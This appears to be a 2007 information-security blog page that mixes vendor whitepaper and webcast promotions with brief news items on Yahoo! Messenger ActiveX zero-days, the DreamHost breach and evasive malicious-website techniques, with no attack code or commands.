Information Security Philippines

The threat vectors that target today’s software applications are constantly evolving. While commercial software security features are improving, vulnerabilities still exist.

Customized and proprietary software – those that power much of today’s business operations – are even more vulnerable, as hackers increasingly target applications that range from e-commerce platforms to legacy accounting systems.

As the number of companies deploying proprietary software on or near public networks continues to spike, concerns about application security are more acute than ever.

What steps can you take to protect your company?

An effective, proactive defense against today’s attacks and tomorrow’s threats requires the right combination of technology and expertise.

Making sure you have the right team in place, typically a blend of internal and external experts, is the first step. Methodically identifying and addressing your company’s vulnerabilities, and establishing a plan for ongoing defensive measures is the next.

This FREE whitepaper from Neophasis will help you better understand the threats your company is facing, and the immediate steps you can take to confidently secure your applications.

Download Neophasis’ Proactive Strategies for Securing Your Applications FREE Whitepaper

Anatomy of a Breach Webcast

June 13 , 2007- 12 p.m. EDT

You harbor vast amounts of confidential information ranging from credit cards to health information to corporate plans. That proprietary data is today’s “new money” and someone is willing to pay for it. Unfortunately, the miscreants who want it may know more about technology—and your IT environment—than your own staff. The stakes are enormous: for your customers, your company, and you.

In this webcast, we examine the fundamental shift of IT risk to the insider threat and the inability of legacy protection mechanisms to stop it. We itemize and quantify the impact from containment to notification. Most importantly, we discuss eradication of the breach risk. New, targeted, caustic threats require new responses that strictly secure your critical information assets, while proving it with 100 percent surety.

Who Should Watch:
Executives responsible for audits, compliance and mitigating data breach risks and security professionals responsible for protecting critical assets on their networks
About the speakers:
William Malik
Consultant, Identity and Information Security
Malik Consulting

Bill Malik has been well-known in information security since the early 1990s when he was a founding member of Gartner’s Information Security Strategies service. He began his IT career in Boston as an applications programmer with the John Hancock Insurance Company following undergraduate work at MIT. He joined IBM’s MVS team and worked in development, testing, business planning, and strategic planning for a dozen years. He moved to Gartner in 1990 and held a series of roles as an analyst and manager through 2002. As CTO of Waveset, a start-up in identity management, he helped the firm grow through its acquisition by Sun, where Bill became Director of Marketing for Security. In 2004 Bill established his independent consulting firm, where he helps clients develop their identity management and information security programs.

Robert Ciampa
Vice President, Marketing and Business Strategy
Trusted Network Technologies

Rob Ciampa has more than 20 years of experience in IT risk management, networking and security. Rob has worked with companies around the world designing and implementing secure infrastructures. An early OS engineer for HP and a former switch and router designer for 3Com, he co-founded one of world’s largest network and security integration firms. Rob then went on to Access360, where he was instrumental in its acquisition by IBM, where he subsequently ran IBM’s worldwide channel for security and identity management. In additional to television commentary on IT and computer security issues, Rob is frequently a featured speaker at major IT venues and events internationally. He has a B.S. in computer science and an M.S. in computer engineering from the University of Massachusetts, as well as an M.B.A. from Boston University. He holds two patents in information technology management. His blog is www.knowidentity.com.

Join the Anatomy of a Breach Webcast

Get a complimentary copy of the Data Integrity Strategy Kit for the Financial Industry from RSA, featuring a new Burton Group report with actionable information on preventing unauthorized or inappropriate changes to business information.

Data Integrity Strategy Kit for the Financial Industry At a Glance:

Burton Group Report
Security and Risk Management Strategies: Information Integrity, March 2007

Podcast
“Real-World Strategies for Protecting your Data” with Jon Oltsik of Enterprise Strategy Group

Data Sheet: File Security Manager
Centrally managed, transparent compromise prevention for critical files

Data Sheet: Database Security Manager
Transparent, policy-driven data protection optimized for heterogeneous database environments
Limited time offer. Download now! http://www.sans.org/info/8461

Two zero-day exploits for remote code execution flaws in Yahoo! Messenger’s Webcam application have been released.

One of the flaws is a boundary error in the Yahoo! Webcam Upload ActiveX control; the other is in the Yahoo! Webcam Viewer ActiveX control.

Yahoo! expects to have a fix for the flaws available soon.  The flaws have been confirmed in Yahoo! Messenger version 8.1.0.249 and may exist in other versions as well.

{Update: As of Friday, June 8, 2007, Yahoo! has already prompted yahoo messenger users to download and install a security upgrade to patch the security issue}

More info here on the Yahoo! ActiveX Flaw.

Attackers broke into the computer systems of web host company DreamHost and installed malware on hundreds of websites, including the official site of the Mercury music awards.

DreamHost said the intruder or intruders exploited a flaw in its web control panel software.

DreamHost has notified affected customers of the breach via email.

The attackers attempted to access the company’s central database and billing data, but no billing or credit card data were compromised in the intrusion.

DreamHost is responsible for more than 500,000 domains.  The intrusion affected approximately 3,500 FTP accounts; users were urged to change their FTP account passwords as soon as possible.

Read Dreamhost’s official statement on the breach

Hackers are developing increasingly stealthy techniques to evade detection.  The attacks place malicious code on web sites, then keep track of the IP addresses that have visited infected sites; if the same IP address attempts to view the malicious site again, benign content is offered in its stead.

The attacks are also capable of identifying “the IP addresses of web crawlers used by URL filtering, reputation services and search engines,” and serve legitimate content to avoid being identified as malicious.

Recent findings reveal that hackers have created a new class of highly evasive attacks which represent a quantum leap in terms of technological sophistication, going far beyond drive-by downloads and code obfuscation.

The combination of these evasive attacks with code obfuscation techniques significantly enhances the capability of sophisticated hackers to go undetected.

A follow-up study conducted by Finjan’s Malicious Code Research Centre warns of the growing presence of malicious code in online advertising.

More info at: VNUNet

It’s been estimated that three-fourths of today’s successful system hacks are perpetrated not via network security flaws, but by entering directly through the “front door” - exploiting vulnerabilities in customer facing web applications.

Grab a copy of SPI Dyanmic’s FREE SQL Injection white paper “SQL Injection: Are Your Web Applications Vulnerable?” Understand and prevent SQL Injection attacks today!

Viruses and threats are changing.

They are now more dangerous than ever. They are more discreet. They are faster. They are frequently designed to steal confidential information or money. They can even be ‘tailor-made’ to target each victim.

Malware Radar is a revolutionary breakthrough scanning technology developed by Panda Software.  Malware Radar has found banks, Fortune 500 companies, small businesses, and even government agencies infected with hidden malicious programs actively stealing information despite being “protected” by what they thought were the best antivirus and Internet security measures available.

Fast, comprehensive, and easy to use:

•     Works online - nothing to install
•     Finds and completely removes hidden malware
•     Works with all antivirus and security programs (does NOT replace them)
•     Leaves no trace on system after scan
•     Produces full comprehensive reports on system vulnerabilities and malware found

Take Malware Radar for a spin to get an automated malware audit.